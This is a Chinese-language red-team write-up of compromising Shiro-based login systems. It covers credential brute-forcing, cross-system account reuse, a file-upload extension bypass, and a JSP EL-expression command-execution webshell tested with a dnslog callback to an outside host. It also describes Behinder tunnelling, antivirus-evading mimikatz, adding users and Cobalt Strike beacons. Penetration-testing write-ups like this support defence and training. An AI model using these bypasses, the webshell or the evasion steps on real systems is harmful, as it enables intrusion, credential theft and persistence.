Bypass文件上傳繞過-Getshell

前言

某次小型紅藍，直接丟過來幾個登陸框，定點打。

全部都是shiro框架。

都是Windows 2012系統

只有登陸框。

用戶名密碼，都是加密的。
查看網頁源代碼的時候，發現其中一個利用的DES-ECB的單層加密。可以看到key。（可以爆）
利用burp-Crypto插件，把key寫進去，點擊add即可

然后，爆破選擇這個加密即可。
經過大量字典，發現目標用戶名規則為名字全稱
zhangsan/lisi
果斷生成大量的字段。
爆破出幾個用戶名，打算訪問的時候，提示沒有應用權限。
我的超大字典，都沒有爆破出一個有效的賬號。

一上午毫無收獲，陷入沉思。

只有登陸框/shiro框架/js讀取/

目標不能掃描/不能打旁站等。

打工人還是先干飯。

干飯的時候，突然想起來。

竟然都是同一家，會不會賬號也是通用的?
用上午在A系統登陸顯示沒有應用權限的賬號，
去B系統/C系統/D系統登陸嘗試。
果然。在B系統和C系統有賬號可以登陸。

zhangsan賬號登陸。直接尋找文件上傳的地方。

壓縮包上傳/
可以上傳，也有路徑回顯。但是不會自動解壓，沒有找到可以利用的點。

2. 文件導入功能。

進行嘗試

返回包，包含網站絕對路徑。

1.jpg  訪問404
1.txt  訪問404
1.jsp(繞過在后面) 訪問404
等等
返回包都包含網站路徑了，就是訪問不到。
接下來嘗試文件路徑尋找。無果。

又沒有思路了。

喝杯水，突然想起來是不是用戶問題。

換一個賬號wangwu進行登陸。

模塊一樣。

直接進行文件導入。

1.jpg 404
2.txt 404

突然感覺這個點要結束，無法上傳。

想著試試jsp吧。

filename="1.js p"  
js后面加一個空格即可
內容為:123

發現這個jsp竟然可以訪問到。

1.訪問404是賬號權限問題
2.目標文件上傳只有jsp能解析等才可以訪問到。

嘗試上傳馬。

發現目標對文件內容檢查

檢測內容為:
<不能直接跟內容
 被攔截
< jsp:scriptlet>   <加空格 可以上傳成功，但是這貌似不符合語法，無法解析。

利用常用的臟字符(不多說)

發現有表哥談論過jsp利用EL表達式繞過。

EL表達式內容為

${Runtime.getRuntime().exec(param.cmd)}
jsp的EL表達式是一種沒有回顯的，
這里先借助dnslog測試。
剛開始訪問時500.一直以為是語法問題，百度也沒有找到解決辦法。
但是后來發現可以調用。

dnslog測試,成功收到

用法

http://localhost:8080/web_test/helloworld.jsp?cmd=ping 08zocw.dnslog.cn

目標是Windows系統。是否可以powershell直接上線呢
本地 測試，成功上線

cs本地可以上線，但是想到我們雙方都是內網，無法直接cs上線，
利用臟字符上傳馬，之后無法連接。

解決辦法

1.冰蝎3.3和哥斯拉都無法連接，這里采用冰蝎2。
2.連接時，需要帶cookie才可以訪問。但是目標cookie變化有點快。有時候存在突然中斷，只能手動換cookie

1.因為這里雙方都是內網的情況下，這里代理采用http協議reGeorg進行代理。

這里需要帶cookie去訪問

但是不知道為啥，過一會就直接中斷，可能和cookie有關，未解決。

2.最終想起來冰蝎3自帶的代理挺好用，但是冰蝎3.3無法連接馬。

想:是不是新版本就可以了。
下載了最新的版本，發現可以連接。
利用冰蝎3自帶的http協議代理成功。

發現目標存在火絨。
利用免殺minikatz讀取目標hash。hash為空，無法登陸。
繞過火絨添加用戶。
成功登陸。

如何上線

關閉目標火絨，cs上線也是曲折的，可能有別的軟件。

1.利用免殺分離免殺上線。
2.powershell免殺上線。
在目標機器部署了cs。然后本地成功上線。（需要免殺）

總結

1.不同系統相同用戶的用法。
2.不同用戶對文件上傳文件訪問權限的不同。
3.文件上傳后綴和內容的繞過
4.http隧道用法
5.繞過火絨的免殺（mimikazt/添加用戶/上線免殺）